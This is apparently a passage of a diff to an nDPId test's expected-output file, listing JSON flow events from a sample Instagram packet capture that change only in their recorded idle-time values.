-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 